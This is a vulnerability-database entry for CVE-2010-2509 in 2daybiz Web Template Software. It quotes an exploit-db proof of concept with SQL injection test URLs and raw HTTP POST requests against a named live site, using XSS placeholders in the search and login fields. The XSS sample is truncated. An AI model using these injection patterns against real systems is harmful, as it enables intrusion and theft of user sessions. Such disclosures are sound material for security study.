2daybiz Web Template Software Multiple Cross-Site Scripting Vulnerabilities

Vulnerability ID: 1119553
Vulnerability type: Cross-site scripting
Published: 2010-06-24
Updated: 2010-06-28
CVE ID: CVE-2010-2509
CNNVD-ID: CNNVD-201006-448
Platform: PHP
CVSS score: 4.3
|Vulnerability source
https://www.exploit-db.com/exploits/14020
https://www.securityfocus.com/bid/73744
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-201006-448
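|Vulnerability details
2daybiz Web Template Software contains multiple cross-site scripting vulnerabilities. A remote attacker can inject arbitrary web script and HTML via (1) the keyword parameter of category.php and (2) the password parameter of memberlogin.php.
|Vulnerability EXP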
$-------------------------------------------------------------------------------------------------------------------
$ 2daybiz - The Web Template Software SQL injection and XSS vulnerability
$ Author : Sangteamtham
$ Home : Hcegroup.net
$ Download :http://www.2daybiz.com/webtemplatesoftware.html
$ Date :06/24/2010
$ Email :sangteamtham@gmail.com
$
$******************************************************************************************

1.SQL injection
http://server/customize.php?tid=[id]+[SQL]

2.XSS

2.a : search products module

Here is my header:

http://www.2daytemplates.com/category.php

POST /category.php HTTP/1.1
Host: www.2daytemplates.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.4) Gecko/20100611 Firefox/3.6.4
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.2daytemplates.com/category.php
Cookie: PHPSESSID=j2bddq540saph1ve83gqii4276
Content-Type: application/x-www-form-urlencoded
Content-Length: 168
category=0&product=0&keyword=[XSS here]&itemno=ssss&templates_per_page=9&search=Search

2.b: Login module

http://www.2daytemplates.com/memberlogin.php

POST /memberlogin.php HTTP/1.1
Host: www.2daytemplates.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.4) Gecko/20100611 Firefox/3.6.4
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.2daytemplates.com/memberlogin.php
Cookie: PHPSESSID=j2bddq540saph1ve83gqii4276
Content-Type: application/x-www-form-urlencoded
Content-Length: 157
email=sangteamtham_hce%40ymail.com&password=[XSS Here]opage=&Submit=Login

XSS here such as:
">">

$******************************************************************************************
$Demo:
$ http://<server>/customize.php?tid=1314+and+1=1--
$ http://<server>/customize.php?tid=1314+and+1=0--
$
$
$
$******************************************************************************************
$ Greetz to: All Vietnamese hackers and Hackers out there researching for more security
$
$
$--------------------------------------------------------------------------------------------------------------------
|Affected products
2daybiz Web Template Software 0
|References

Source: EXPLOIT-DB
Name: 14020
Link: http://www.exploit-db.com/exploits/14020
Source: SECUNIA
Name: 40348
Link: http://secunia.com/advisories/40348